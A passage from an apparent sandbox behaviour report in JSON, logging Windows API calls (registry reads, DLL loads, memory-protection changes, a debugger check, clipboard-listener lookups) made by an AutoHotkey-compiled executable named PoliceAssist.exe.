                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 56
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000001cc"
              }
            ],
            "repeated": 0,
            "id": 57
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee13f7000"
              },
              {
                "name": "ModuleName",
                "value": "bcryptPrimitives.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 58
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\System32\\bcryptPrimitives"
              },
              {
                "name": "DllBase",
                "value": "0x7ffee1390000"
              }
            ],
            "repeated": 0,
            "id": 59
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000234"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Lsa\\FipsAlgorithmPolicy"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa\\FipsAlgorithmPolicy"
              }
            ],
            "repeated": 0,
            "id": 60
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000234"
              },
              {
                "name": "ValueName",
                "value": "STE"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\STE"
              }
            ],
            "repeated": 0,
            "id": 61
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000234"
              }
            ],
            "repeated": 0,
            "id": 62
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000234"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Lsa\\FipsAlgorithmPolicy"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa\\FipsAlgorithmPolicy"
              }
            ],
            "repeated": 0,
            "id": 63
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000234"
              },
              {
                "name": "ValueName",
                "value": "Enabled"
              },
              {
                "name": "Type",
                "value": "4",
                "pretty_value": "REG_DWORD"
              },
              {
                "name": "Information",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\Enabled"
              }
            ],
            "repeated": 0,
            "id": 64
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000238"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Lsa"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa"
              }
            ],
            "repeated": 0,
            "id": 65
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000238"
              },
              {
                "name": "ValueName",
                "value": "FipsAlgorithmPolicy"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy"
              }
            ],
            "repeated": 0,
            "id": 66
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000234"
              },
              {
                "name": "ValueName",
                "value": "MDMEnabled"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\MDMEnabled"
              }
            ],
            "repeated": 0,
            "id": 67
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000234"
              }
            ],
            "repeated": 0,
            "id": 68
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000238"
              }
            ],
            "repeated": 0,
            "id": 69
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "registry",
            "api": "NtOpenKey",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Policies\\Microsoft\\Cryptography\\Configuration"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Policies\\Microsoft\\Cryptography\\Configuration"
              }
            ],
            "repeated": 0,
            "id": 70
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000238"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100001",
                "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "\\Device\\CNG"
              },
              {
                "name": "ShareAccess",
                "value": "7",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 71
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "device",
            "api": "DeviceIoControl",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "DeviceHandle",
                "value": "0x00000238"
              },
              {
                "name": "IoControlCode",
                "value": "0x00390008",
                "pretty_value": "IOCTL_KSEC_RANDOM_FILL_BUFFER"
              },
              {
                "name": "InBuffer",
                "value": ""
              },
              {
                "name": "OutBuffer",
                "value": "}U\\x8e\\x8cG\\x04\\x12\\x92\r~\\xc7J\r\\xb32\\xf8{H\\x8e\\xe2\\x08\\xce\\x97Y\\x91\\x85\\xfb\\x8d\\xb0k_\\xae?a\\xce\\x99\\x13\\xff\\xf0\\xc4\\xd7\\x18\\x1c\\+\\xcb\\x17>"
              }
            ],
            "repeated": 0,
            "id": 72
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "system",
            "api": "LdrpCallInitRoutine",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "MappedPath",
                "value": "\\Device\\HarddiskVolume2\\Windows\\System32\\bcryptprimitives"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1390000"
              },
              {
                "name": "InitRoutine",
                "value": "0x7ffee13c8b60"
              },
              {
                "name": "Reason",
                "value": "1"
              }
            ],
            "repeated": 0,
            "id": 73
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee345e000"
              },
              {
                "name": "ModuleName",
                "value": "RPCRT4.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 74
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee345e000"
              },
              {
                "name": "ModuleName",
                "value": "RPCRT4.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 75
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x008d1000"
              },
              {
                "name": "RegionSize",
                "value": "0x00006000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 76
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee3271000"
              },
              {
                "name": "ModuleName",
                "value": "combase.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 77
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee3271000"
              },
              {
                "name": "ModuleName",
                "value": "combase.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 78
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\system32\\uxtheme"
              },
              {
                "name": "DllBase",
                "value": "0x7ffede5b0000"
              }
            ],
            "repeated": 0,
            "id": 79
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\uxtheme.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffede5b0000"
              }
            ],
            "repeated": 0,
            "id": 80
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "system",
            "api": "LoadLibraryExW",
            "status": true,
            "return": "0x7ffede5b0000",
            "arguments": [
              {
                "name": "lpLibFileName",
                "value": "C:\\Windows\\system32\\uxtheme.dll"
              },
              {
                "name": "dwFlags",
                "value": "0x00000008"
              }
            ],
            "repeated": 0,
            "id": 81
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "uxtheme.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffede5b0000"
              },
              {
                "name": "FunctionName",
                "value": "ThemeInitApiHook"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffede5bcde0"
              }
            ],
            "repeated": 0,
            "id": 82
          },
          {
            "timestamp": "2025-11-20 10:58:26,047",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "system",
            "api": "IsDebuggerPresent",
            "status": false,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 83
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "1"
              },
              {
                "name": "TokenInformation",
                "value": " \\xee\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 84
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000240"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00020019",
                "pretty_value": "KEY_READ"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER"
              }
            ],
            "repeated": 0,
            "id": 85
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000240"
              },
              {
                "name": "KeyInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "KeyInformationClass",
                "value": "7"
              }
            ],
            "repeated": 0,
            "id": 86
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "registry",
            "api": "NtOpenKeyEx",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000244"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000240"
              },
              {
                "name": "ObjectAttributesName",
                "value": "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Themes\\Personalize"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Themes\\Personalize"
              }
            ],
            "repeated": 0,
            "id": 87
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000244"
              },
              {
                "name": "ValueName",
                "value": "AppsUseLightTheme"
              },
              {
                "name": "Data",
                "value": "1"
              },
              {
                "name": "FullName",
                "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Themes\\Personalize\\AppsUseLightTheme"
              }
            ],
            "repeated": 0,
            "id": 88
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000244"
              }
            ],
            "repeated": 0,
            "id": 89
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000240"
              }
            ],
            "repeated": 0,
            "id": 90
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "process",
            "api": "NtOpenProcessToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000008"
              },
              {
                "name": "TokenHandle",
                "value": "0x00000244"
              }
            ],
            "repeated": 0,
            "id": 91
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "29"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 92
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000244"
              }
            ],
            "repeated": 0,
            "id": 93
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "synchronization",
            "api": "NtAddAtomEx",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "AtomName",
                "value": "OleDropTargetInterface"
              },
              {
                "name": "Atom",
                "value": "0x0000c01e"
              }
            ],
            "repeated": 0,
            "id": 94
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001e96d",
            "parentcaller": "0x1400df209",
            "category": "synchronization",
            "api": "NtAddAtomEx",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "AtomName",
                "value": "OleDropTargetMarshalHwnd"
              },
              {
                "name": "Atom",
                "value": "0x0000c01f"
              }
            ],
            "repeated": 0,
            "id": 95
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001bba4",
            "parentcaller": "0x1400cad9c",
            "category": "system",
            "api": "LdrGetDllHandle",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "ntdll.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee3470000"
              }
            ],
            "repeated": 0,
            "id": 96
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x14001bbb4",
            "parentcaller": "0x1400cad9c",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "ntdll.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee3470000"
              },
              {
                "name": "FunctionName",
                "value": "RtlGetVersion"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffee34ae4e0"
              }
            ],
            "repeated": 0,
            "id": 97
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x1400df2b1",
            "parentcaller": "0x1400cad9c",
            "category": "system",
            "api": "LdrGetDllHandle",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "user32"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee1f70000"
              }
            ],
            "repeated": 0,
            "id": 98
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x1400df2c1",
            "parentcaller": "0x1400cad9c",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "USER32.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee1f70000"
              },
              {
                "name": "FunctionName",
                "value": "RemoveClipboardFormatListener"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffee1f9cef0"
              }
            ],
            "repeated": 0,
            "id": 99
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x1400df2e1",
            "parentcaller": "0x1400cad9c",
            "category": "system",
            "api": "LdrGetDllHandle",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "user32"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee1f70000"
              }
            ],
            "repeated": 0,
            "id": 100
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x1400df2f1",
            "parentcaller": "0x1400cad9c",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "USER32.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee1f70000"
              },
              {
                "name": "FunctionName",
                "value": "AddClipboardFormatListener"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffee1f9cf10"
              }
            ],
            "repeated": 0,
            "id": 101
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x1400ae373",
            "parentcaller": "0x1400ae49c",
            "category": "filesystem",
            "api": "FindFirstFileExW",
            "status": true,
            "return": "0x008ad200",
            "arguments": [
              {
                "name": "FileName",
                "value": "C:\\Temp"
              },
              {
                "name": "FirstCreateTimeLow",
                "value": "0x0c174eca"
              },
              {
                "name": "FirstCreateTimeHigh",
                "value": "0x01dc598a"
              }
            ],
            "repeated": 0,
            "id": 102
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x1400ae387",
            "parentcaller": "0x1400ae49c",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000244"
              }
            ],
            "repeated": 0,
            "id": 103
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x1400ae3ef",
            "parentcaller": "0x1400ae49c",
            "category": "filesystem",
            "api": "FindFirstFileExW",
            "status": true,
            "return": "0x008acf60",
            "arguments": [
              {
                "name": "FileName",
                "value": "C:\\Temp\\PoliceAssist.exe"
              },
              {
                "name": "FirstCreateTimeLow",
                "value": "0xbdb88d69"
              },
              {
                "name": "FirstCreateTimeHigh",
                "value": "0x01dc59a8"
              }
            ],
            "repeated": 0,
            "id": 104
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x1400ae402",
            "parentcaller": "0x1400ae49c",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000244"
              }
            ],
            "repeated": 0,
            "id": 105
          },
          {
            "timestamp": "2025-11-20 10:58:26,062",
            "thread_id": "2188",
            "caller": "0x140020820",
            "parentcaller": "0x1400201a7",
            "category": "misc",
            "api": "FindResourceExW",
            "status": true,
            "return": "0x1401313b0",
            "arguments": [
              {
                "name": "Module",
                "value": "0x00000000"
              },
              {
                "name": "Type",
                "value": "#10"
              },
              {
                "name": "Name",
                "value": ">AUTOHOTKEY SCRIPT<"
              },
              {
                "name": "Language",
